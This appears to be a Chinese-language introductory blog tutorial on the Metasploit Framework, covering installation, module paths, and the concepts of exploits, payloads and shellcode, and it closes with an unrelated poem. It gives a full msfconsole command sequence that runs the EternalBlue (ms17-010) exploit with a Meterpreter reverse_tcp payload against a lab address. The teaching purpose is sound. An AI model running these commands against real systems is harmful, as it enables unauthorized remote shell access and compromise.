Metasploit介绍

Metasploit的介绍

• MetasploitFramework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新
• Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。
• 刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。
• 在kali中，自带了Metasploit工具。

apt-get install metasploit-framework
1

MSF中exploit模块

进入框架：msfconsole
使用search命令查找相关漏洞： search ms17-010
使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue
使用info查看模块信息： info
设置攻击载荷：set payload windows/x64/meterpreter/reverse_tcp
查看模块需要配置的参数：show options
设置参数：set RHOST 192.168.232.143
set lhost 192.168.232.140
攻击：exploit / run
后渗透
1
2
3
4
5
6
7
8
9
10

漏洞利用exploit

• 也就是我们常说的 exp，他就是对漏洞进行攻击的代码。

• exploit漏洞利用模块路径：/usr/share/metasploit-framework/modules/exploits
  

• 这里面有针对不同平台的 exploit 。

• 进入 windows 平台，这里会列出针对windows平台不同服务的漏洞利用
  

• 进入smb服务，这是windows中经常爆出漏洞的服务，比如我们的永恒之蓝漏洞就在这里面。

• 漏洞利用代码是以 rb 结尾的文件，因为metasploit是用Ruby语言编写的。
  

攻击载荷(payload)

• payload模块路径：/usr/share/metasploit-framework/modules/payloads
• Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码，而在Metasploit中Payload是一种特殊模块，它们能够以漏洞利用模块运行，并能够利用目标系统中的安全漏洞实施攻击。
• 简而言之，这种漏洞利用模块可以访问目标系统，而其中的代码定义了Payload在目标系统中的行为。
• Shellcode：Shellcode是payload中的精髓部分，在渗透攻击时作为攻击载荷运行的一组机器指令。
• Shellcode通常用汇编语言编写。
• 在大多数情况下，目标系统执行了shellcode这一组指令之后，才会提供一个命令行shell。

cd /usr/share/metasploit-framework/modules/payloads
1

Metasploit中的 Payload 模块

Meterpreter

摘抄

人的一生是万里山河，
来往无数过客。
有人给江河添色，
有人使日月无光，
有人改他江流，
有人塑他梁骨，
大限到时，
不过是立在山巅，
江河回望。
– 《德卡先生的信箱》